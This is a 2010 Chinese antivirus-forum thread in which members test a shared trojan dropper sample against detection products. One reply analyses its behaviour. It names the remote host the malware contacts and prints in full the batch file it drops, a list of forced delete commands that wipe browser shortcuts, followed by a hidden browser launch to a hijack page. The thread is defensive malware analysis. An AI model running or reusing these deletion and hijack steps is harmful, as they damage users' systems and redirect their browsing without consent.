查看: 3707|回复: 22
收起左侧

[病毒样本] 高質量

  [复制链接]
post8
头像被屏蔽
发表于 2010-11-4 07:07:41 | 显示全部楼层 |阅读模式
avira kill dropper.gen

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wxh23
发表于 2010-11-4 09:12:22 | 显示全部楼层
红伞扫描无反应,运行被拦截
猪头大队
头像被屏蔽
发表于 2010-11-4 09:25:42 | 显示全部楼层
过VSE,360主防解压之后无反应,网盾报未知
win98sp123
发表于 2010-11-4 09:31:19 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
zihan911521
发表于 2010-11-4 10:12:59 | 显示全部楼层
很强悍啦。
zihan911521
发表于 2010-11-4 10:28:49 | 显示全部楼层
总共创建6个线程。
1,访问远程文件:new.9688.la/5day.txt      Socket连接IP:61.147.75.36:端口:80.
2,在该目录下创建配置文件C:\Documents and Settings\Administrator\Application Data\360se\360se.ini 以及C:\Documents and Settings\Administrator\Application Data\Kingsoft\kws\kws.ini  然后安装金山网盾的软件
3,创建一个批处理文件C:2222.bat 内容为:
  del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*.url"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*.ink"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*浏览器*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\腾讯TT.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\Opera.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\傲游*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*firefox*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*.ink" /f/q/a
del "C:\Documents and Settings\Administrator\桌面\IEXP*.*" /f/q/a
del "%userprofile%\「开始」菜单\程序\Intern*.*"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\Internat*.*"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\*hao123*"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\*.ink"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\*浏览器*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\腾讯TT.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\Opera.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\傲游*.lnk"  /f/q/a
del "%userprofile%\「开始」菜单\*.url"   /f/q/a
del "C:\Documents and Settings\All Users\「开始」菜单\*.url" /f/q/a
del "C:\Documents and Settings\All Users\桌面\*.ink" /f/q/a
del "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\*.*" /f/q/a
4,以隐藏窗口的方式启动进程
C:\Program Files\Internet Explorer\IEXPLORE.EXE    http://www.9688.la./cn.html?ok
5,在临时文件路径下创建d.tmp文件:内容为:221.123.180.107,保留地址,,,
dengcc
头像被屏蔽
发表于 2010-11-4 10:37:13 | 显示全部楼层
Virus or unwanted program 'TR/Dropper.Gen [trojan]'
detected in file 'L:\down\nodepad.exe.
Action performed: Delete file
fatezero
发表于 2010-11-4 10:40:59 | 显示全部楼层
TO KL
歌歌的人
发表于 2010-11-4 11:06:09 | 显示全部楼层
过蜘蛛

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-9 17:08 , Processed in 0.127090 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表